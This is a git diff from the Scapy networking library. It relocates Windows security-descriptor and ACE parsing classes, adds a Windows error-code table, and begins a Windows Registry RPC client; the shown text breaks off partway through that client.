ace_type = { - 0x00: "A", - 0x01: "D", - 0x02: "AU", - 0x05: "OA", - 0x06: "OD", - 0x07: "OU", - 0x11: "ML", - 0x13: "SP", - }[self.AceType] - return "(%s)" % ( - ";".join( - x - for x in [ - ace_type, - data["ace-flags-string"], - ace_rights, - str(data["object-guid"]), - str(data["inherited-object-guid"]), - data["sid-string"], - data["cond-expr"], - ] - if x is not None - ) - ) - - -# [MS-DTYP] sect 2.4.4.2 - - -class WINNT_ACCESS_ALLOWED_ACE(Packet): - fields_desc = [ - FlagsField("Mask", 0, -32, _WINNT_ACCESS_MASK), - PacketField("Sid", WINNT_SID(), WINNT_SID), - ] - - -bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_ALLOWED_ACE, AceType=0x00) - - -# [MS-DTYP] sect 2.4.4.3 - - -class WINNT_ACCESS_ALLOWED_OBJECT_ACE(Packet): - fields_desc = [ - FlagsField("Mask", 0, -32, _WINNT_ACCESS_MASK), - FlagsField( - "Flags", - 0, - -32, - { - 0x00000001: "OBJECT_TYPE_PRESENT", - 0x00000002: "INHERITED_OBJECT_TYPE_PRESENT", - }, - ), - ConditionalField( - UUIDField("ObjectType", None, uuid_fmt=UUIDField.FORMAT_LE), - lambda pkt: pkt.Flags.OBJECT_TYPE_PRESENT, - ), - ConditionalField( - UUIDField("InheritedObjectType", None, uuid_fmt=UUIDField.FORMAT_LE), - lambda pkt: pkt.Flags.INHERITED_OBJECT_TYPE_PRESENT, - ), - PacketField("Sid", WINNT_SID(), WINNT_SID), - ] - - -bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_ALLOWED_OBJECT_ACE, AceType=0x05) - - -# [MS-DTYP] sect 2.4.4.4 - - -class WINNT_ACCESS_DENIED_ACE(Packet): - fields_desc = WINNT_ACCESS_ALLOWED_ACE.fields_desc - - -bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_DENIED_ACE, AceType=0x01) - - -# [MS-DTYP] sect 2.4.4.5 - - -class WINNT_ACCESS_DENIED_OBJECT_ACE(Packet): - fields_desc = WINNT_ACCESS_ALLOWED_OBJECT_ACE.fields_desc - - -bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_DENIED_OBJECT_ACE, AceType=0x06) - - -# [MS-DTYP] sect 2.4.4.17.4+ - - -class WINNT_APPLICATION_DATA_LITERAL_TOKEN(Packet): - def default_payload_class(self, payload): - return conf.padding_layer - - -# fmt: off -WINNT_APPLICATION_DATA_LITERAL_TOKEN.fields_desc = [ - ByteEnumField( - "TokenType", - 0, - { - # [MS-DTYP] sect 2.4.4.17.5 - 0x00: "Padding token", - 0x01: "Signed int8", - 0x02: "Signed int16", - 0x03: "Signed int32", - 0x04: "Signed int64", - 0x10: "Unicode", - 0x18: "Octet String", - 0x50: "Composite", - 0x51: "SID", - # [MS-DTYP] sect 2.4.4.17.6 - 0x80: "==", - 0x81: "!=", - 0x82: "<", - 0x83: "<=", - 0x84: ">", - 0x85: ">=", - 0x86: "Contains", - 0x88: "Any_of", - 0x8e: "Not_Contains", - 0x8f: "Not_Any_of", - 0x89: "Member_of", - 0x8a: "Device_Member_of", - 0x8b: "Member_of_Any", - 0x8c: "Device_Member_of_Any", - 0x90: "Not_Member_of", - 0x91: "Not_Device_Member_of", - 0x92: "Not_Member_of_Any", - 0x93: "Not_Device_Member_of_Any", - # [MS-DTYP] sect 2.4.4.17.7 - 0x87: "Exists", - 0x8d: "Not_Exists", - 0xa0: "&&", - 0xa1: "||", - 0xa2: "!", - # [MS-DTYP] sect 2.4.4.17.8 - 0xf8: "Local attribute", - 0xf9: "User Attribute", - 0xfa: "Resource Attribute", - 0xfb: "Device Attribute", - } - ), - ConditionalField( - # Strings - LEIntField("length", 0), - lambda pkt: pkt.TokenType in [ - 0x10, # Unicode string - 0x18, # Octet string - 0xf8, 0xf9, 0xfa, 0xfb, # Attribute tokens - 0x50, # Composite - ] - ), - ConditionalField( - MultipleTypeField( - [ - ( - LELongField("value", 0), - lambda pkt: pkt.TokenType in [ - 0x01, # signed int8 - 0x02, # signed int16 - 0x03, # signed int32 - 0x04, # signed int64 - ] - ), - ( - StrLenFieldUtf16("value", b"", length_from=lambda pkt: pkt.length), - lambda pkt: pkt.TokenType in [ - 0x10, # Unicode string - 0xf8, 0xf9, 0xfa, 0xfb, # Attribute tokens - ] - ), - ( - StrLenField("value", b"", length_from=lambda pkt: pkt.length), - lambda pkt: pkt.TokenType == 0x18, # Octet string - ), - ( - PacketListField("value", [], WINNT_APPLICATION_DATA_LITERAL_TOKEN, - length_from=lambda pkt: pkt.length), - lambda pkt: pkt.TokenType == 0x50, # Composite - ), - - ], - StrFixedLenField("value", b"", length=0), - ), - lambda pkt: pkt.TokenType in [ - 0x01, 0x02, 0x03, 0x04, 0x10, 0x18, 0xf8, 0xf9, 0xfa, 0xfb, 0x50 - ] - ), - ConditionalField( - # Literal - ByteEnumField("sign", 0, { - 0x01: "+", - 0x02: "-", - 0x03: "None", - }), - lambda pkt: pkt.TokenType in [ - 0x01, # signed int8 - 0x02, # signed int16 - 0x03, # signed int32 - 0x04, # signed int64 - ] - ), - ConditionalField( - # Literal - ByteEnumField("base", 0, { - 0x01: "Octal", - 0x02: "Decimal", - 0x03: "Hexadecimal", - }), - lambda pkt: pkt.TokenType in [ - 0x01, # signed int8 - 0x02, # signed int16 - 0x03, # signed int32 - 0x04, # signed int64 - ] - ), -] -# fmt: on - - -class WINNT_APPLICATION_DATA(Packet): - fields_desc = [ - StrFixedLenField("Magic", b"\x61\x72\x74\x78", length=4), - PacketListField( - "Tokens", - [], - WINNT_APPLICATION_DATA_LITERAL_TOKEN, - ), - ] - - def default_payload_class(self, payload): - return conf.padding_layer - - -# [MS-DTYP] sect 2.4.4.6 - - -class WINNT_ACCESS_ALLOWED_CALLBACK_ACE(Packet): - fields_desc = WINNT_ACCESS_ALLOWED_ACE.fields_desc + [ - PacketField( - "ApplicationData", WINNT_APPLICATION_DATA(), WINNT_APPLICATION_DATA - ), - ] - - -bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_ALLOWED_CALLBACK_ACE, AceType=0x09) - - -# [MS-DTYP] sect 2.4.4.7 - - -class WINNT_ACCESS_DENIED_CALLBACK_ACE(Packet): - fields_desc = WINNT_ACCESS_ALLOWED_CALLBACK_ACE.fields_desc - - -bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_DENIED_CALLBACK_ACE, AceType=0x0A) - - -# [MS-DTYP] sect 2.4.4.8 - - -class WINNT_ACCESS_ALLOWED_CALLBACK_OBJECT_ACE(Packet): - fields_desc = WINNT_ACCESS_ALLOWED_OBJECT_ACE.fields_desc + [ - PacketField( - "ApplicationData", WINNT_APPLICATION_DATA(), WINNT_APPLICATION_DATA - ), - ] - - -bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_ALLOWED_CALLBACK_OBJECT_ACE, AceType=0x0B) - - -# [MS-DTYP] sect 2.4.4.9 - - -class WINNT_ACCESS_DENIED_CALLBACK_OBJECT_ACE(Packet): - fields_desc = WINNT_ACCESS_DENIED_OBJECT_ACE.fields_desc + [ - PacketField( - "ApplicationData", WINNT_APPLICATION_DATA(), WINNT_APPLICATION_DATA - ), - ] - - -bind_layers(WINNT_ACE_HEADER, WINNT_ACCESS_DENIED_CALLBACK_OBJECT_ACE, AceType=0x0C) - - -# [MS-DTYP] sect 2.4.4.10 - - -class WINNT_SYSTEM_AUDIT_ACE(Packet): - fields_desc = WINNT_ACCESS_ALLOWED_ACE.fields_desc - - -bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_AUDIT_ACE, AceType=0x02) - - -# [MS-DTYP] sect 2.4.4.11 - - -class WINNT_SYSTEM_AUDIT_OBJECT_ACE(Packet): - # doc is wrong. - fields_desc = WINNT_ACCESS_ALLOWED_OBJECT_ACE.fields_desc - - -bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_AUDIT_OBJECT_ACE, AceType=0x07) - - -# [MS-DTYP] sect 2.4.4.12 - - -class WINNT_SYSTEM_AUDIT_CALLBACK_ACE(Packet): - fields_desc = WINNT_SYSTEM_AUDIT_ACE.fields_desc + [ - PacketField( - "ApplicationData", WINNT_APPLICATION_DATA(), WINNT_APPLICATION_DATA - ), - ] - - -bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_AUDIT_CALLBACK_ACE, AceType=0x0D) - - -# [MS-DTYP] sect 2.4.4.13 - - -class WINNT_SYSTEM_MANDATORY_LABEL_ACE(Packet): - fields_desc = WINNT_SYSTEM_AUDIT_ACE.fields_desc - - -bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_MANDATORY_LABEL_ACE, AceType=0x11) - - -# [MS-DTYP] sect 2.4.4.14 - - -class WINNT_SYSTEM_AUDIT_CALLBACK_OBJECT_ACE(Packet): - fields_desc = WINNT_SYSTEM_AUDIT_OBJECT_ACE.fields_desc - - -bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_AUDIT_CALLBACK_OBJECT_ACE, AceType=0x0F) - -# [MS-DTYP] sect 2.4.10.1 - - -class CLAIM_SECURITY_ATTRIBUTE_RELATIVE_V1(_NTLMPayloadPacket): - _NTLM_PAYLOAD_FIELD_NAME = "Data" - fields_desc = [ - LEIntField("NameOffset", 0), - LEShortEnumField( - "ValueType", - 0, - { - 0x0001: "CLAIM_SECURITY_ATTRIBUTE_TYPE_INT64", - 0x0002: "CLAIM_SECURITY_ATTRIBUTE_TYPE_UINT64", - 0x0003: "CLAIM_SECURITY_ATTRIBUTE_TYPE_STRING", - 0x0005: "CLAIM_SECURITY_ATTRIBUTE_TYPE_SID", - 0x0006: "CLAIM_SECURITY_ATTRIBUTE_TYPE_BOOLEAN", - 0x0010: "CLAIM_SECURITY_ATTRIBUTE_TYPE_OCTET_STRING", - }, - ), - LEShortField("Reserved", 0), - FlagsField( - "Flags", - 0, - -32, - { - 0x0001: "CLAIM_SECURITY_ATTRIBUTE_NON_INHERITABLE", - 0x0002: "CLAIM_SECURITY_ATTRIBUTE_VALUE_CASE_SENSITIVE", - 0x0004: "CLAIM_SECURITY_ATTRIBUTE_USE_FOR_DENY_ONLY", - 0x0008: "CLAIM_SECURITY_ATTRIBUTE_DISABLED_BY_DEFAULT", - 0x0010: "CLAIM_SECURITY_ATTRIBUTE_DISABLED", - 0x0020: "CLAIM_SECURITY_ATTRIBUTE_MANDATORY", - }, - ), - LEIntField("ValueCount", 0), - FieldListField( - "ValueOffsets", [], LEIntField("", 0), count_from=lambda pkt: pkt.ValueCount - ), - _NTLMPayloadField( - "Data", - lambda pkt: 16 + pkt.ValueCount * 4, - [ - ConditionalField( - StrFieldUtf16("Name", b""), - lambda pkt: pkt.NameOffset, - ), - # TODO: Values - ], - offset_name="Offset", - ), - ] - - -# [MS-DTYP] sect 2.4.4.15 - - -class WINNT_SYSTEM_RESOURCE_ATTRIBUTE_ACE(Packet): - fields_desc = WINNT_ACCESS_ALLOWED_ACE.fields_desc + [ - PacketField( - "AttributeData", - CLAIM_SECURITY_ATTRIBUTE_RELATIVE_V1(), - CLAIM_SECURITY_ATTRIBUTE_RELATIVE_V1, - ) - ] - - -bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_RESOURCE_ATTRIBUTE_ACE, AceType=0x12) - -# [MS-DTYP] sect 2.4.4.16 - - -class WINNT_SYSTEM_SCOPED_POLICY_ID_ACE(Packet): - fields_desc = WINNT_ACCESS_ALLOWED_ACE.fields_desc - - -bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_SCOPED_POLICY_ID_ACE, AceType=0x13) - -# [MS-DTYP] sect 2.4.5 - - -class WINNT_ACL(Packet): - fields_desc = [ - ByteField("AclRevision", 2), - ByteField("Sbz1", 0x00), - # Total size including header: - # AclRevision(1) + Sbz1(1) + AclSize(2) + AceCount(2) + Sbz2(2) - FieldLenField( - "AclSize", - None, - length_of="Aces", - adjust=lambda _, x: x + 8, - fmt=" bytes - return ( - _NTLM_post_build( - self, - pkt, - self.OFFSET, - { - "OwnerSid": 4, - "GroupSid": 8, - "SACL": 12, - "DACL": 16, - }, - config=[ - ("Offset", _NTLM_ENUM.OFFSET), - ], - ) - + pay - ) - - # [MS-FSCC] 2.4.2 FileAllInformation diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index cef9f6e6195..3b806d6fcdd 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -57,11 +57,11 @@ SMB_Dialect, SMB_Header, ) +from scapy.layers.windows.security import SECURITY_DESCRIPTOR from scapy.layers.smb2 import ( DirectTCP, FileAllInformation, FileIdBothDirectoryInformation, - SECURITY_DESCRIPTOR, SMB2_CREATE_DURABLE_HANDLE_REQUEST_V2, SMB2_CREATE_REQUEST_LEASE, SMB2_CREATE_REQUEST_LEASE_V2, @@ -1876,16 +1876,7 @@ def getsd_output(self, results): Print the output of 'getsd' """ sd = SECURITY_DESCRIPTOR(results) - print("Owner:", sd.OwnerSid.summary()) - print("Group:", sd.GroupSid.summary()) - if getattr(sd, "DACL", None): - print("DACL:") - for ace in sd.DACL.Aces: - print(" - ", ace.toSDDL()) - if getattr(sd, "SACL", None): - print("SACL:") - for ace in sd.SACL.Aces: - print(" - ", ace.toSDDL()) + sd.show_print() if __name__ == "__main__": diff --git a/scapy/layers/smbserver.py b/scapy/layers/smbserver.py index be1c68ee247..99c6ba7d89f 100644 --- a/scapy/layers/smbserver.py +++ b/scapy/layers/smbserver.py @@ -55,6 +55,7 @@ SMBTree_Connect_AndX, SMB_Header, ) +from scapy.layers.windows.security import SECURITY_DESCRIPTOR from scapy.layers.smb2 import ( DFS_REFERRAL_ENTRY1, DFS_REFERRAL_V3, @@ -76,7 +77,6 @@ FileStandardInformation, FileStreamInformation, NETWORK_INTERFACE_INFO, - SECURITY_DESCRIPTOR, SMB2_CREATE_DURABLE_HANDLE_RESPONSE_V2, SMB2_CREATE_QUERY_MAXIMAL_ACCESS_RESPONSE, SMB2_CREATE_QUERY_ON_DISK_ID, diff --git a/scapy/layers/windows/__init__.py b/scapy/layers/windows/__init__.py new file mode 100644 index 00000000000..95ea60fbbe5 --- /dev/null +++ b/scapy/layers/windows/__init__.py @@ -0,0 +1,17 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + + +""" +This package implements Windows-specific high level helpers. +It makes it easier to use Scapy Windows related objects. + +It currently contains helpers for the Windows Registry. + +Note that if you want to tweak specific fields of the underlying +protocols, you will have to use the lower level objects directly. +""" + +# Make sure config is loaded +from scapy.config import conf # noqa: F401 diff --git a/scapy/layers/windows/erref.py b/scapy/layers/windows/erref.py new file mode 100644 index 00000000000..ba17053ce12 --- /dev/null +++ b/scapy/layers/windows/erref.py @@ -0,0 +1,76 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +[MS-ERREF] error codes +""" + +# SMB2 sect 3.3.5.15 + [MS-ERREF] +STATUS_ERREF = { + 0x00000000: "STATUS_SUCCESS", + 0x00000002: "ERROR_FILE_NOT_FOUND", + 0x00000003: "ERROR_PATH_NOT_FOUND", + 0x00000005: "ERROR_ACCESS_DENIED", + 0x00000006: "ERROR_INVALID_HANDLE", + 0x00000011: "ERROR_NOT_SAME_DEVICE", + 0x00000013: "ERROR_WRITE_PROTECT", + 0x00000057: "ERROR_INVALID_PARAMETER", + 0x0000007A: "ERROR_INSUFFICIENT_BUFFER", + 0x0000007B: "ERROR_INVALID_NAME", + 0x000000A1: "ERROR_BAD_PATHNAME", + 0x000000B7: "ERROR_ALREADY_EXISTS", + 0x000000EA: "ERROR_MORE_DATA", + 0x00000103: "STATUS_PENDING", + 0x0000010B: "STATUS_NOTIFY_CLEANUP", + 0x0000010C: "STATUS_NOTIFY_ENUM_DIR", + 0x000003E6: "ERROR_NOACCESS", + 0x00000532: "ERROR_PASSWORD_EXPIRED", + 0x00000533: "ERROR_ACCOUNT_DISABLED", + 0x000006F7: "ERROR_SUBKEY_NOT_FOUND", + 0x000006FE: "ERROR_TRUST_FAILURE", + 0x80000005: "STATUS_BUFFER_OVERFLOW", + 0x80000006: "STATUS_NO_MORE_FILES", + 0x8000002D: "STATUS_STOPPED_ON_SYMLINK", + 0x80070005: "E_ACCESSDENIED", + 0x8007000E: "E_OUTOFMEMORY", + 0x80090308: "SEC_E_INVALID_TOKEN", + 0x8009030C: "SEC_E_LOGON_DENIED", + 0x8009030F: "SEC_E_MESSAGE_ALTERED", + 0x80090310: "SEC_E_OUT_OF_SEQUENCE", + 0x80090346: "SEC_E_BAD_BINDINGS", + 0x80090351: "SEC_E_SMARTCARD_CERT_REVOKED", + 0xC0000003: "STATUS_INVALID_INFO_CLASS", + 0xC0000004: "STATUS_INFO_LENGTH_MISMATCH", + 0xC000000D: "STATUS_INVALID_PARAMETER", + 0xC000000F: "STATUS_NO_SUCH_FILE", + 0xC0000016: "STATUS_MORE_PROCESSING_REQUIRED", + 0xC0000022: "STATUS_ACCESS_DENIED", + 0xC0000033: "STATUS_OBJECT_NAME_INVALID", + 0xC0000034: "STATUS_OBJECT_NAME_NOT_FOUND", + 0xC0000043: "STATUS_SHARING_VIOLATION", + 0xC0000061: "STATUS_PRIVILEGE_NOT_HELD", + 0xC0000064: "STATUS_NO_SUCH_USER", + 0xC000006D: "STATUS_LOGON_FAILURE", + 0xC000006E: "STATUS_ACCOUNT_RESTRICTION", + 0xC0000070: "STATUS_INVALID_WORKSTATION", + 0xC0000071: "STATUS_PASSWORD_EXPIRED", + 0xC0000072: "STATUS_ACCOUNT_DISABLED", + 0xC000009A: "STATUS_INSUFFICIENT_RESOURCES", + 0xC00000BA: "STATUS_FILE_IS_A_DIRECTORY", + 0xC00000BB: "STATUS_NOT_SUPPORTED", + 0xC00000C9: "STATUS_NETWORK_NAME_DELETED", + 0xC00000CC: "STATUS_BAD_NETWORK_NAME", + 0xC0000120: "STATUS_CANCELLED", + 0xC0000122: "STATUS_INVALID_COMPUTER_NAME", + 0xC0000128: "STATUS_FILE_CLOSED", # backup error for older Win versions + 0xC000015B: "STATUS_LOGON_TYPE_NOT_GRANTED", + 0xC000018B: "STATUS_NO_TRUST_SAM_ACCOUNT", + 0xC000019C: "STATUS_FS_DRIVER_REQUIRED", + 0xC0000203: "STATUS_USER_SESSION_DELETED", + 0xC000020C: "STATUS_CONNECTION_DISCONNECTED", + 0xC0000225: "STATUS_NOT_FOUND", + 0xC0000257: "STATUS_PATH_NOT_COVERED", + 0xC000035C: "STATUS_NETWORK_SESSION_EXPIRED", +} diff --git a/scapy/layers/windows/registry.py b/scapy/layers/windows/registry.py new file mode 100644 index 00000000000..edf26b11ec0 --- /dev/null +++ b/scapy/layers/windows/registry.py @@ -0,0 +1,903 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) github.com/Ebrix + +""" +Windows Registry RPCs + +This file provides high-level wrapping over Windows Registry related RPCs. +(scapy.layers.msrpce.raw.ms_rrp) +""" + +import struct + +from enum import IntEnum, IntFlag +from typing import Optional, Union, List + +from scapy.compat import StrEnum +from scapy.packet import Packet +from scapy.error import log_runtime + +from scapy.layers.windows.security import ( + SECURITY_DESCRIPTOR, +) +from scapy.layers.msrpce.rpcclient import DCERPC_Client +from scapy.layers.dcerpc import ( + NDRConformantArray, + NDRPointer, + NDRVaryingArray, + DCERPC_Transport, + DCE_C_AUTHN_LEVEL, + find_dcerpc_interface, +) + +from scapy.layers.msrpce.raw.ms_rrp import ( + BaseRegCloseKey_Request, + BaseRegCreateKey_Request, + BaseRegDeleteKey_Request, + BaseRegDeleteValue_Request, + BaseRegEnumKey_Request, + BaseRegEnumValue_Request, + BaseRegGetKeySecurity_Request, + BaseRegGetVersion_Request, + BaseRegOpenKey_Request, + BaseRegQueryInfoKey_Request, + BaseRegQueryInfoKey_Response, + BaseRegQueryValue_Request, + BaseRegSaveKey_Request, + BaseRegSetValue_Request, + NDRContextHandle, + OpenClassesRoot_Request, + OpenCurrentConfig_Request, + OpenCurrentUser_Request, + OpenLocalMachine_Request, + OpenPerformanceData_Request, + OpenPerformanceNlsText_Request, + OpenPerformanceText_Request, + OpenUsers_Request, + PRPC_SECURITY_ATTRIBUTES, + PRPC_SECURITY_DESCRIPTOR, + RPC_UNICODE_STRING, +) + + +class RootKeys(StrEnum): + """ + Standard root keys for the Windows registry + """ + + HKEY_CLASSES_ROOT = "HKCR" + HKEY_CURRENT_USER = "HKCU" + HKEY_LOCAL_MACHINE = "HKLM" + HKEY_CURRENT_CONFIG = "HKCC" + HKEY_USERS = "HKU" + HKEY_PERFORMANCE_DATA = "HKPD" + HKEY_PERFORMANCE_TEXT = "HKPT" + HKEY_PERFORMANCE_NLSTEXT = "HKPN" + + def __new__(cls, value): + # 1. Strip and uppercase the raw input + normalized = value.strip().upper() + # 2. Create the enum member with the normalized value + obj = str.__new__(cls, normalized) + obj._value_ = normalized + return obj + + +class RegOptions(IntFlag): + """ + Registry options for registry keys + """ + + REG_OPTION_NON_VOLATILE = 0x00000000 + REG_OPTION_VOLATILE = 0x00000001 + REG_OPTION_CREATE_LINK = 0x00000002 + REG_OPTION_BACKUP_RESTORE = 0x00000004 + REG_OPTION_OPEN_LINK = 0x00000008 + REG_OPTION_DONT_VIRTUALIZE = 0x00000010 + + +class RegType(IntEnum): + """ + Registry value types + """ + + # These constants are used to specify the type of a registry value. + + REG_SZ = 1 # Unicode string + REG_EXPAND_SZ = 2 # Unicode string with environment variable expansion + REG_BINARY = 3 # Binary data + REG_DWORD = 4 # 32-bit unsigned integer + REG_DWORD_BIG_ENDIAN = 5 # 32-bit unsigned integer in big-endian format + REG_LINK = 6 # Symbolic link + REG_MULTI_SZ = 7 # Multiple Unicode strings + REG_QWORD = 11 # 64-bit unsigned integer + UNK = 99999 # fallback default + + @classmethod + def _missing_(cls, value): + log_runtime.info(f"Unknown registry type: {value}, using UNK") + unk = cls.UNK + unk.real_value = value + return unk + + def __new__(cls, value, real_value=None): + obj = int.__new__(cls, value) + obj._value_ = value + if real_value is None: + real_value = value + obj.real_value = real_value + return obj + + @classmethod + def fromstr(cls, value: Union[str, int]) -> "RegType": + """ + Convert a string to a RegType enum member. + + :param value: The string representation of the registry type. + :return: The corresponding RegType enum member. + """ + if isinstance(value, int): + try: + return cls(value) + except ValueError: + log_runtime.info(f"Unknown registry type: {value}, using UNK") + return cls.UNK + else: + # we want to make sure that regdword, reg_dword, dword and upper + # case equivalents are all properly parsed + value = value.strip().upper() + if "_" not in value: + if value[:3] == "REG": + value = value[3:] + value = "REG_" + value.replace("REG", "", 1) + try: + return cls[value] + except (ValueError, KeyError): + log_runtime.info(f"Unknown registry type: {value}, using UNK") + return cls.UNK + + +class RegEntry: + """ + RegEntry represents a Registry Value, inside a Registry Key. + + :param reg_name: the name of the registry value + :param reg_type: the type of the registry value + :param reg_data: the data of the registry value + """ + + def __init__( + self, + reg_name: str, + reg_type: int, + reg_data: Union[list, str, bytes, int], + ): + # Name + self.reg_name = reg_name + + # Type + try: + self.reg_type = RegType(reg_type) + except ValueError: + self.reg_type = RegType.UNK + + # Check data type + if reg_type == RegType.REG_MULTI_SZ: + if not isinstance(reg_data, list): + raise ValueError("Data must be a 'list' of 'str' for this type.") + elif reg_type in [ + RegType.REG_SZ, + RegType.REG_EXPAND_SZ, + RegType.REG_LINK, + ]: + if not isinstance(reg_data, str): + raise ValueError("Data must be a 'str' for this type.") + elif reg_type == RegType.REG_BINARY: + if not isinstance(reg_data, bytes): + raise ValueError("Data must be a 'bytes' for this type.") + elif reg_type in [ + RegType.REG_DWORD, + RegType.REG_QWORD, + RegType.REG_DWORD_BIG_ENDIAN, + ]: + if not isinstance(reg_data, int): + raise ValueError("Data must be a 'int' for this type.") + else: + if not isinstance(reg_data, bytes): + raise ValueError("Data of this unknown type must be a 'bytes'.") + + self.reg_data = reg_data + + def encode(self) -> bytes: + """ + Encode data based on the type. + """ + if self.reg_type == RegType.REG_MULTI_SZ: + # encode to multiple null terminated strings + return ( + b"\x00\x00".join(x.strip().encode("utf-16le") for x in self.reg_data) + + b"\x00\x00" # final \x00 + + b"\x00\x00" # final empty string + ) + elif self.reg_type in [ + RegType.REG_SZ, + RegType.REG_EXPAND_SZ, + RegType.REG_LINK, + ]: + return self.reg_data.encode("utf-16le") + elif self.reg_type == RegType.REG_BINARY: + return self.reg_data + elif self.reg_type in [ + RegType.REG_DWORD, + RegType.REG_QWORD, + RegType.REG_DWORD_BIG_ENDIAN, + ]: + fmt = { + RegType.REG_DWORD: "I", + }[self.reg_type] + return struct.pack(fmt, self.reg_data) + else: + return self.reg_data + + @staticmethod + def frombytes(reg_name: str, reg_type: RegType, data: bytes): + """ + Create a RegEntry from bytes read on the network. + """ + if reg_type == RegType.REG_MULTI_SZ: + # encode to multiple null terminated strings + reg_data = [x.decode("utf-16le") for x in data.split(b"\x00\x00")[:-1]] + elif reg_type in [ + RegType.REG_SZ, + RegType.REG_EXPAND_SZ, + RegType.REG_LINK, + ]: + reg_data = data.decode("utf-16le") + elif reg_type == RegType.REG_BINARY: + reg_data = data + elif reg_type in [ + RegType.REG_DWORD, + RegType.REG_QWORD, + RegType.REG_DWORD_BIG_ENDIAN, + ]: + fmt = { + RegType.REG_DWORD: "I", + }[reg_type] + reg_data = struct.unpack(fmt, data)[0] + else: + reg_data = data + + return RegEntry( + reg_name=reg_name, + reg_type=reg_type, + reg_data=reg_data, + ) + + @staticmethod + def fromstr(reg_name: str, reg_type: RegType, data: str): + """ + Create a RegEntry from user input. + """ + if reg_type == RegType.REG_MULTI_SZ: + reg_data = data.split(";") + elif reg_type in [ + RegType.REG_SZ, + RegType.REG_EXPAND_SZ, + RegType.REG_LINK, + ]: + reg_data = data + elif reg_type == RegType.REG_BINARY: + reg_data = bytes.fromhex(data) + elif reg_type in [ + RegType.REG_DWORD, + RegType.REG_QWORD, + RegType.REG_DWORD_BIG_ENDIAN, + ]: + reg_data = int(data) + else: + reg_data = data + + return RegEntry( + reg_name=reg_name, + reg_type=reg_type, + reg_data=reg_data, + ) + + def __str__(self) -> str: + return ( + f"{self.reg_value} ({self.reg_type.name}: " + + f"{self.reg_type.real_value if self.reg_type == RegType.UNK else self.reg_type.value}" # noqa E501 + + f") {self.reg_data}" + ) + + def __repr__(self) -> str: + return f"RegEntry({self.reg_value}, {self.reg_type}, {self.reg_data})" + + def __eq__(self, value): + return isinstance(value, RegEntry) and all( + [ + self.reg_data == value.reg_data, + self.reg_type == value.reg_type, + self.reg_data == value.reg_data, + ] + ) + + +class RRP_Client(DCERPC_Client): + """ + High level [MS-RRP] (Windows Registry) Client + """ + + def __init__( + self, + auth_level=DCE_C_AUTHN_LEVEL.PKT_INTEGRITY, + verb=True, + **kwargs, + ): + self.interface = find_dcerpc_interface("winreg") + super(RRP_Client, self).__init__( + DCERPC_Transport.NCACN_NP, + auth_level=auth_level, + verb=verb, + **kwargs, + ) + + def connect(self, host, **kwargs): + """ + This calls DCERPC_Client's connect + """ + super(RRP_Client, self).connect( + host=host, + interface=self.interface, + endpoint="winreg", + **kwargs, + ) + + def bind(self): + """ + This calls DCERPC_Client's bind + """ + super(RRP_Client, self).bind(self.interface) + + def get_root_key_handle( + self, + root_key_name: RootKeys, + sam_desired: int = 0x2000000, # Maximum Allowed + timeout: int = 5, + ) -> Optional[NDRContextHandle]: + """ + Get a handle to a root key. + + :param root_key_name: The name of the root key to open. + Must be one of the RootKeys enum values. + :param sam_desired: The desired access rights for the key. + :param ServerName: The server name. The ServerName SHOULD be + sent as NULL, and MUST be ignored + when it is received because binding to the server + is already complete at this stage + :return: The handle to the opened root key. + """ + + cls_req = { + RootKeys.HKEY_CLASSES_ROOT: OpenClassesRoot_Request, + RootKeys.HKEY_CURRENT_USER: OpenCurrentUser_Request, + RootKeys.HKEY_LOCAL_MACHINE: OpenLocalMachine_Request, + RootKeys.HKEY_USERS: OpenUsers_Request, + RootKeys.HKEY_CURRENT_CONFIG: OpenCurrentConfig_Request, + RootKeys.HKEY_PERFORMANCE_DATA: OpenPerformanceData_Request, + RootKeys.HKEY_PERFORMANCE_TEXT: OpenPerformanceText_Request, + RootKeys.HKEY_PERFORMANCE_NLSTEXT: OpenPerformanceNlsText_Request, + } + + if root_key_name not in cls_req: + raise ValueError(f"Unknown root key: {root_key_name}") + + return self.sr1_req( + cls_req[root_key_name]( + ServerName=None, + samDesired=sam_desired, + ), + timeout=timeout, + ).phKey + + def get_subkey_handle( + self, + root_key_handle: NDRContextHandle, + subkey_path: str, + desired_access_rights: int = 0x2000000, # Maximum Allowed + options: RegOptions = RegOptions.REG_OPTION_NON_VOLATILE, + timeout: int = 5, + ) -> NDRContextHandle: + """ + Get a handle to a subkey. + + :param root_key_handle: The handle to the root key. + :param subkey_path: The name of the subkey to open. + :param desired_access_rights: The desired access rights for the subkey. + :param timeout: The timeout for the request. + :return: The handle to the opened subkey. + """ + + # Ensure it is null-terminated and handle the special case of "." + if str(subkey_path) == ".": + subkey_path = "\x00" + elif not str(subkey_path).endswith("\x00"): + subkey_path = str(subkey_path) + "\x00" + + response = self.sr1_req( + BaseRegOpenKey_Request( + hKey=root_key_handle, + lpSubKey=RPC_UNICODE_STRING(Buffer=subkey_path), + samDesired=desired_access_rights, + dwOptions=options, + ), + timeout=timeout, + ) + + if response.status != 0: + raise ValueError(response.status) + + return response.phkResult + + def get_version( + self, + key_handle: NDRContextHandle, + timeout: int = 5, + ) -> Packet: + """ + Get the version of the registry server. + + :param client: The DCERPC client. + :param timeout: The timeout for the request. + :return: The response packet containing the version information. + """ + + response = self.sr1_req( + BaseRegGetVersion_Request( + hKey=key_handle, + ), + 